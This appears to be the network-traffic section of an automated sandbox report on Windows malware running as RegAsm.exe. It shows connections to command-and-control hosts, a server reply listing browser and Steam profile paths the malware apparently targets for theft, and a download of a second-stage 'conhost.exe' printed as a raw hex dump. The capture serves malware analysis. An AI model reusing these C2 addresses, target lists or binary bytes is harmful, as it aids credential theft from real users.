                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629147053 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629183054 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629231930 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629264116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629278898 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629309893 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629321098 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629344940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629396915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629441023 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629446983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629491091 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629497051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629528999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629578114 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629606009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629623890 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629638910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629656076 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629672050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629704952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629736900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629749060 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629767895 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629781961 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629801035 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629832983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629878044 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629884005 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629915953 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629925966 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629949093 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629981995 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630014896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630031109 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630048037 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630060911 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630080938 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630111933 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630143881 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630157948 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630175114 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630191088 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630207062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630239010 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630271912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630292892 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630304098 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630316019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630337954 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630371094 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630403042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630418062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630434990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630450010 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630474091 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630502939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630533934 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630549908 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630568027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630580902 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630599976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630633116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630667925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630681992 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.630718946 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.827929974 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.832959890 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:16.481069088 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:16.498001099 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:16.498703957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.358719110 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.363688946 CEST8049715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.363817930 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.364132881 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.369108915 CEST8049715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.040649891 CEST8049715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.040699005 CEST8049715188.114.97.3192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.040786982 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.040786982 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.044631004 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:23.044631004 CEST4971580192.168.2.5188.114.97.3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.520895004 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.521006107 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.521087885 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.525257111 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.525295019 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.993392944 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.993465900 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.998485088 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.998526096 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.999067068 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.051466942 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.091984987 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.135411978 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193106890 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193226099 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193367958 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193393946 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193491936 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193548918 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193567038 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193696976 CEST44349716104.20.3.235192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.193747044 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:26.197185040 CEST49716443192.168.2.5104.20.3.235
                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.530639887 CEST6269853192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.341588974 CEST5995753192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.350564003 CEST53599571.1.1.1192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.508187056 CEST5064253192.168.2.51.1.1.1
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.515336990 CEST53506421.1.1.1192.168.2.5
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.530639887 CEST192.168.2.51.1.1.10x206bStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.341588974 CEST192.168.2.51.1.1.10xddceStandard query (0)joxi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.508187056 CEST192.168.2.51.1.1.10xe249Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.537872076 CEST1.1.1.1192.168.2.50x206bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.350564003 CEST1.1.1.1192.168.2.50xddceNo error (0)joxi.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:22.350564003 CEST1.1.1.1192.168.2.50xddceNo error (0)joxi.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.515336990 CEST1.1.1.1192.168.2.50xe249No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.515336990 CEST1.1.1.1192.168.2.50xe249No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:25.515336990 CEST1.1.1.1192.168.2.50xe249No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                        • pastebin.com
                                                                                                                                                                                                                                        • 147.45.47.81
                                                                                                                                                                                                                                        • joxi.net
                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.549704185.215.113.22803724C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:01.405046940 CEST38OUTData Raw: 00 01 00 01 02 02 1c 6e 65 74 2e 74 63 70 3a 2f 2f 31 38 35 2e 32 31 35 2e 31 31 33 2e 32 32 3a 38 30 2f 03 08 0c
                                                                                                                                                                                                                                        Data Ascii: net.tcp://185.215.113.22:80/
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.277618885 CEST1INData Raw: 0b
                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.309242010 CEST203OUTData Raw: 06 c8 01 53 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 31 1c 6e 65 74 2e 74 63 70 3a 2f 2f 31 38 35 2e 32 31 35 2e 31 31 33 2e 32 32 3a 38 30 2f 03 49 64 31 13 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69
                                                                                                                                                                                                                                        Data Ascii: Shttp://tempuri.org/Entity/Id1net.tcp://185.215.113.22:80/Id1http://tempuri.org/VsaVD@Authorizationns1 2512ea8d547d5afb96b66992e487c694Dq!KB#2D,D*DVB
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:02.541531086 CEST142INData Raw: 06 8b 01 50 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 31 52 65 73 70 6f 6e 73 65 0b 49 64 31 52 65 73 70 6f 6e 73 65 13 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 09 49 64 31 52 65 73 75
                                                                                                                                                                                                                                        Data Ascii: P%http://tempuri.org/Entity/Id1ResponseId1Responsehttp://tempuri.org/Id1ResultVsaVDDq!KB#2DVBB
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:07.926651955 CEST154OUTData Raw: 06 97 01 22 1d 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 03 49 64 32 56 02 0b 01 73 04 0b 01 61 06 56 08 44 0a 1e 00 82 ab 09 40 0d 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 08 03 6e 73 31 99 20 32 35 31
                                                                                                                                                                                                                                        Data Ascii: "http://tempuri.org/Entity/Id2Id2VsaVD@Authorizationns1 2512ea8d547d5afb96b66992e487c694DiTJ\OD,D*DVB
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.413638115 CEST1236INData Raw: 06 ff 33 f8 01 25 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 74 69 74 79 2f 49 64 32 52 65 73 70 6f 6e 73 65 0b 49 64 32 52 65 73 70 6f 6e 73 65 09 49 64 32 52 65 73 75 6c 74 06 45 6e 74 69 74 79 29 68 74 74 70 3a 2f 2f 77 77
                                                                                                                                                                                                                                        Data Ascii: 3%http://tempuri.org/Entity/Id2ResponseId2ResponseId2ResultEntity)http://www.w3.org/2001/XMLSchema-instanceId1Id109http://schemas.microsoft.com/2003/10/Serialization/ArraysstringId11Id12Id13Entity17Id2Id3Entity16Id4Id5Id6I
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.413753033 CEST124INData Raw: 46 19 99 2d 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 46 19 99 31 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37
                                                                                                                                                                                                                                        Data Ascii: F-%USERPROFILE%\AppData\Local\Iridium\User DataF1%USERPROFILE%\AppData\Local\7Star\7Star\User DataF1%USERPROFILE%\AppD
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414014101 CEST1236INData Raw: 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e 74 42 72 6f 77 73 65 72 5c 55 73 65 72 20 44 61 74 61 46 19 99 2c 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 65 64 6f 74 5c 55 73 65 72 20 44 61 74 61 46 19 99
                                                                                                                                                                                                                                        Data Ascii: ata\Local\CentBrowser\User DataF,%USERPROFILE%\AppData\Local\Chedot\User DataF-%USERPROFILE%\AppData\Local\Vivaldi\User DataF,%USERPROFILE%\AppData\Local\Kometa\User DataF6%USERPROFILE%\AppData\Local\Elements Browser\User DataF:%USER
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414086103 CEST224INData Raw: 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 6f 63 43 6f 63 5c 42 72 6f 77 73 65 72 5c 55 73 65 72 20 44 61 74 61 46 19 99 2a 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 55
                                                                                                                                                                                                                                        Data Ascii: ERPROFILE%\AppData\Local\CocCoc\Browser\User DataF*%USERPROFILE%\AppData\Local\Uran\User DataF.%USERPROFILE%\AppData\Local\Chromodo\User DataF2%USERPROFILE%\AppData\Local\Mail.Ru\Atom\User DataFA%USERPROFILE%\AppData
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:08.414127111 CEST1236INData Raw: 5c 4c 6f 63 61 6c 5c 42 72 61 76 65 53 6f 66 74 77 61 72 65 5c 42 72 61 76 65 2d 42 72 6f 77 73 65 72 5c 55 73 65 72 20 44 61 74 61 46 19 99 34 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 69 63 72 6f 73
                                                                                                                                                                                                                                        Data Ascii: \Local\BraveSoftware\Brave-Browser\User DataF4%USERPROFILE%\AppData\Local\Microsoft\Edge\User DataFH%USERPROFILE%\AppData\Local\NVIDIA Corporation\NVIDIA GeForce ExperienceF!%USERPROFILE%\AppData\Local\SteamF-%USERPROFILE%\AppData\Loca


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.549706147.45.47.81803724C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.456480026 CEST73OUTGET /conhost.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 147.45.47.81
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077673912 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sun, 29 Sep 2024 07:44:12 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3125704
                                                                                                                                                                                                                                        Last-Modified: Tue, 20 Aug 2024 12:02:17 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "66c485c9-2fb1c8"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 58 05 30 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 d4 4e 00 00 00 00 00 00 00 00 00 00 c0 75 2f 00 08 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ`@`!L!Require Windows$PEL?O_@X00Nu/<l.text `.rdata;<@@.dataM@.rsrcN0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077760935 CEST224INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                        Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077807903 CEST1236INData Raw: c9 c2 0c 00 8b 44 24 08 85 c0 74 0c a3 6c e9 41 00 b8 05 40 00 80 eb 3a 56 8b 74 24 08 57 8d 7e 24 83 3f 00 74 0f 8b 4e 20 8d 46 34 50 83 c1 08 e8 c0 11 01 00 8b cf e8 da 29 01 00 83 7e 1c 00 74 0c ff 76 40 ff 76 28 ff 15 80 a1 41 00 5f 33 c0 5e
                                                                                                                                                                                                                                        Data Ascii: D$tlA@:Vt$W~$?tN F4P)~tv@v(A_3^UVuA}juuv(j}iuv(jjuVP^]=AtjA=XAtL$AVQ3=lAQjjPR=Atj5XAA^L$
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077879906 CEST1236INData Raw: 8b 76 0c 85 f6 59 74 06 8b 06 56 ff 50 08 5e c3 83 6c 24 04 04 e9 76 ff ff ff 56 6a 01 8b f1 e8 d3 fc ff ff 8b 46 04 8b 0e 66 8b 54 24 08 66 89 14 41 ff 46 04 8b 46 04 8b 0e 66 83 24 41 00 8b c6 5e c2 04 00 55 8b ec ff 75 0c 8b 4d 08 e8 03 fc ff
                                                                                                                                                                                                                                        Data Ascii: vYtVP^l$vVjFfT$fAFFf$A^UuMuME]Vt$NFuhVrzY3^Uh$AuYYtEMPQ3hAu{YYu@]L$IAujP3VNXAD
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077959061 CEST1236INData Raw: 8d 55 d4 0f 95 c0 52 6a 0c ff 75 0c 89 46 3c 8b 46 0c 8b 08 50 ff 51 18 3b c7 89 45 0c 74 19 8d 4d d4 e8 fe 08 01 00 ff 75 f0 e8 ec 75 01 00 8b 7d 0c 59 e9 cf fe ff ff 0f b7 45 d4 3b c7 74 1a 83 f8 40 74 07 6a 66 e9 71 ff ff ff 8b 45 dc 89 46 34
                                                                                                                                                                                                                                        Data Ascii: URjuF<FPQ;EtMuu}YE;t@tjfqEF4EF8EPAF4PEPA9~<t3Y>jh/N4QPYY%jlu;YtxXAH3PMF (F jQHxx,
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078008890 CEST1236INData Raw: 64 a1 41 00 eb 7a 83 3d 90 e9 41 00 00 75 6f 8b 35 68 a1 41 00 68 d0 a5 41 00 bb c4 a5 41 00 53 c7 05 90 e9 41 00 01 00 00 00 ff d6 8b 3d 6c a1 41 00 50 ff d7 6a 00 89 45 fc 0f b7 05 80 e9 41 00 68 09 04 00 00 6a 00 50 8d 45 bc 68 a8 a5 41 00 50
                                                                                                                                                                                                                                        Data Ascii: dAz=Auo5hAhAASA=lAPjEAhjPEhAPA}uhASPEtjEPjU3_^[U,SVW3WAjXPE0A}j`X5TAj`jdPv|=j[j=j[j_EPju@AWSuW
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078057051 CEST896INData Raw: 00 50 ff 15 34 a1 41 00 85 c0 7e 13 8d 85 58 ff ff ff 50 ff 15 d4 a1 41 00 59 a3 84 e0 41 00 8d 47 01 50 ff b6 bc e0 41 00 57 53 6a 00 ff 35 84 e0 41 00 ff 15 38 a1 41 00 8b 86 bc e0 41 00 5f 5e 5b c9 c3 83 3d b0 e0 41 00 00 74 20 56 be bc e0 41
                                                                                                                                                                                                                                        Data Ascii: P4A~XPAYAGPAWSj5A8AA_^[=At VAtPl&Y~u^U$hAhAhAPlAtMQE38Au0A=At*h@AhAhAPlAt5A%A%Ah`A
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078104973 CEST1236INData Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83
                                                                                                                                                                                                                                        Data Ascii: ujWPOG;~|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078151941 CEST1236INData Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75
                                                                                                                                                                                                                                        Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ
